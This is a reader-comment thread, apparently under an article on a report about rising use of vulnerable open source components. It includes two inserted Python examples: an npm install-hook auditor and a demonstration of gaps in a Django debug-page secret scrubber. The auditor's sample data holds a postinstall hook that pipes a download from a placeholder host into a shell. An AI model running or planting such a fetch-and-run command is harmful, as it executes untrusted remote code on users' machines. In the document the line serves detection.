Facepalm
Well, thank goodness for proprietary closed-source software where vulnerabilities don't get detected, reported or fixed and therefore don't exist.
I don't suppose those Open Sourcerers would ever consider issuing patches, either.
Use of vulnerable open source components has doubled over the last year despite their role in the high profile Equifax mega-breach. Sonatype’s fourth annual Software Supply Chain Report, published on Tuesday (available here, registration required), revealed a 120 per cent rise in the use of vulnerable open source components …
Just how different are code repositories from the primary OS repositories of the major Linux distros? And how much more probable is it that a zero day will show up in an alpha or beta repo than in a release version? I'm thinking these things need to get some moderation and other security controls.
Oooh, that looks like a very big straw man you've just set up there.....
This is about an increase in vulnerabilities in open source. Putting your fingers in your ears and going "la la la, closed source is worse" doesn't cut it.
How is the open source community going to reverse this and increase security? How bad does it have to get before they pay attention to it at all?
"The time required for hackers to exploit a newly disclosed open source vulnerability has shrunk 400% in the last decade."
How can the exploit time fluctuate if the source code has been in the public domain all the time?
I want to know how something can shrink by more than 100%, but there you go.
Well since "Several of the problems listed by Sonatype involved messing around with NPM, a utility used by JavaScript projects to install dependencies" I'd say that the problem is NOT open source software per se; it's the reliance on a potentially buggy [and security risk] system for "updates".
Updates are overrated, ESPECIALLY when they result in CREATING back-doors and viruses and trojans [oh my!]. You don't need "bleeding edge" all of the time. It's better to have something STABLE that gets timely security patches. This goes TRIPLE for things that "change the rules" (Firefox 57 comes to mind) on you, even though you REALLY LIKE THE ONE YOU HAVE and REALLY HATE WHAT THEY DID TO IT.
"Just because a buggy application is 'open source' does NOT mean that 'open source' is the problem." - Captain Obvious
Also worth pointing out that Javascript is in and of itself "a problem".
The problem isn't open source per se, it is that the code gets fixed, published, people can look at it and work out easily where the problems were and quickly exploit them. With closed source, they need to reverse engineer or get lucky. Once the fix is published, with closed source, they have a heads up where to look, which also shortens the exploit time there.
Add in that, as said, a lot of security updates never get centrally reported, as stated in the article, just in the daily check-ins and release notes, which most people only read if they are actually installing an update, if at all. That means most users never even know there are security patches available.
But a lot of open source is installed and forgotten about, because it is "open source" and not Microsoft / IBM / SAP, it often sits unloved on a server somewhere in the metaphorical corner and doesn't get updated, because it isn't "core" to the company's LoB.
That gives a lot more scope for exploiting open source software, not because it is worse than closed source, but because the information is easily accessible by hackers, down to which lines of code have been modified, and the users often aren't informed in time that there are patches available, unless it is a major issue. The dozens of minor issues that the devs discover themselves and patch quietly in the check-in logs are still available to the hackers, but which user pores over the daily check-in logs of every bit of software they have installed?
No, people who don't know how to use JavaScript but insist on writing it are the problem. Just like people can write bad code in any other language. And knowledge of other curly bracket languages does not make you a JavaScript developer or mean that your lack of understanding is JavaScript's fault.
This makes sense. Yes, it's open source, but in practice they're much like binaries - many install scripts have active payloads on install - you have to trust the code before seeing it (though you could browse what's _hopefully_ the same code on GitHub).
Open source collaboration is too valuable, and even high quality closed source is not sufficiently superior wrt security, for us to seriously roll back in time.
But this trust by default reminds me a bit of when we were still exchanging EXEs and active VBAs in Outlook. It was only a matter of time till someone got hurt.
What gets my goat is when StackOverflow questions on how to do something simple in Python, JS, Chef, Ansible or Django get answered with "oh, don't worry your pretty little head, install package XYZ". Who cares if the code you'd need to write yourself would be <20 lines vs installing a package that's 4 yrs old, has one unknown author, and only 200 downloads?
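The point made a few comments up, that npm packages are in practice like binaries because install scripts carry active payloads, is easy to check before the code ever runs: the hooks are declared in each package's `package.json`. The script below is an added example, not part of the thread or of npm itself; the three manifests it inspects are constructed for illustration (`native-addon`, `sneaky-helper` and `tidy-strings` are made-up package names, and `example.invalid` is a placeholder host).

```python
import json
from typing import Dict, List, Tuple

# Lifecycle scripts that npm runs automatically while installing a package.
# preinstall/install/postinstall run for registry packages; prepare also runs
# when a dependency is installed from a git URL.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def install_hooks(package_json: str) -> Dict[str, str]:
    """Return the install-time lifecycle scripts declared in one package.json."""
    manifest = json.loads(package_json)
    scripts = manifest.get("scripts", {})
    if not isinstance(scripts, dict):
        return {}
    return {name: cmd for name, cmd in scripts.items() if name in INSTALL_HOOKS}


def audit(packages: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Given {package name: package.json text}, list every (package, hook, command)
    that would execute during `npm install`, sorted by package name."""
    findings = []
    for pkg, text in packages.items():
        for hook, cmd in install_hooks(text).items():
            findings.append((pkg, hook, cmd))
    return sorted(findings)


# Constructed sample manifests (not real packages).
SAMPLE_PACKAGES = {
    "tidy-strings": '{"name": "tidy-strings", "version": "1.2.0", '
                    '"scripts": {"test": "mocha"}}',
    "native-addon": '{"name": "native-addon", "version": "0.4.1", '
                    '"scripts": {"install": "node-gyp rebuild"}}',
    "sneaky-helper": '{"name": "sneaky-helper", "version": "2.0.3", '
                     '"scripts": {"postinstall": '
                     '"curl https://example.invalid/setup.sh | sh"}}',
}

if __name__ == "__main__":
    for pkg, hook, cmd in audit(SAMPLE_PACKAGES):
        print(f"{pkg}: {hook} -> {cmd}")
```

A native addon running `node-gyp rebuild` is a legitimate reason for an install hook, so the output needs a human to read it; the value of the check is that it surfaces every such command before anything executes. For a real tree, feed it the `package.json` files under `node_modules/`, and consider installing with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) so that nothing runs until you have looked.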
Django deserves its own category. How many web authors leave it in 'debug' mode to avoid the complexity of identifying everything that's capable of being downloaded...
Never mind that it's bloatware on steroids written in Python for good measure.
Django in and of itself. Yeah. PHP and CGI for the win!
He he, we agree on something. In debug mode Django dumps out stack traces to the browser, and all daemon-visible server env variables too, for extra transparency, though there's, I believe, a regex to scrub out '.*(secret|password).*'.
Django 101: debug = True is only for dev. If someone's too dumb to know that, it's like someone not knowing you should always assume a gun is loaded.
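What the scrubbing regex mentioned above does and does not protect is worth seeing concretely. The block below is an added example, not Django's own code: it reimplements the idea of a key-name-based settings cleanser (the pattern used here is an assumption modeled on that idea; Django's real list is longer and has changed across releases, and the real reporter also handles request data), runs it over a constructed settings dictionary, and then asks which values a known secret still leaks through.

```python
import re
from typing import Any, Dict, List

# Assumed pattern: keys that look like credentials get their values masked.
# Django's own filter is similar in spirit but not identical to this.
HIDDEN_SETTINGS = re.compile(r"API|TOKEN|KEY|SECRET|PASS|SIGNATURE", re.IGNORECASE)
SUBSTITUTE = "********************"


def cleanse_setting(key: Any, value: Any) -> Any:
    """Mask `value` if its key looks sensitive; otherwise recurse into containers."""
    if isinstance(key, str) and HIDDEN_SETTINGS.search(key):
        return SUBSTITUTE
    if isinstance(value, dict):
        return {k: cleanse_setting(k, v) for k, v in value.items()}
    if isinstance(value, (list, tuple)):
        return type(value)(cleanse_setting("", v) for v in value)
    return value


def debug_page_settings(settings: Dict[str, Any]) -> Dict[str, Any]:
    """The settings a DEBUG=True error page would render after cleansing."""
    return {k: cleanse_setting(k, v) for k, v in settings.items()}


def leaked_through(settings: Dict[str, Any], secret: str) -> List[str]:
    """Top-level setting names whose cleansed value still contains `secret`."""
    rendered = debug_page_settings(settings)
    return sorted(k for k, v in rendered.items() if secret in repr(v))


# Constructed settings for illustration; the values are not real credentials.
SETTINGS = {
    "DEBUG": True,
    "SECRET_KEY": "django-insecure-0123456789",
    "DATABASES": {
        "default": {"USER": "app", "PASSWORD": "hunter2", "HOST": "db"},
    },
    # Same password, but embedded in a value whose key matches nothing above.
    "DATABASE_URL": "postgres://app:hunter2@db/app",
    # "CREDENTIAL" is not in the pattern, so this key is not masked either.
    "SMTP_CREDENTIAL": "mailpass",
}

if __name__ == "__main__":
    for name, value in debug_page_settings(SETTINGS).items():
        print(f"{name} = {value!r}")
    print("still leaks hunter2 via:", leaked_through(SETTINGS, "hunter2"))
```

The scrubber is a net under the trapeze, not a reason to leave `DEBUG = True` on: it only recognises secrets by the name of the setting, so a password inside a connection URL, or under a key the pattern was never told about, is printed in full to whoever triggers an exception. Production settings need `DEBUG = False` regardless of what the filter catches.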
I'm more interested in the fact that hackers were caught installing vulnerabilities directly into the source code and very few people are noticing. The ones that have been reported are probably the tip of the iceberg. That is one of the big issues with open source, when everybody is working on it, who is vetting these people and making sure that they are not doing something nefarious? Brings to mind "too many cooks...."
Indeed, much more interesting.
Or would be, if it were more than a dark hint. Who exactly is being accused here? Developer communities? Packagers? Distributors? And what are they accused of: malice, incompetence, insufficient oversight, being blackmailed, ??? Or is this just the case that's been my bugbear for years, of downloads from reputable sources but with no cryptographic signature?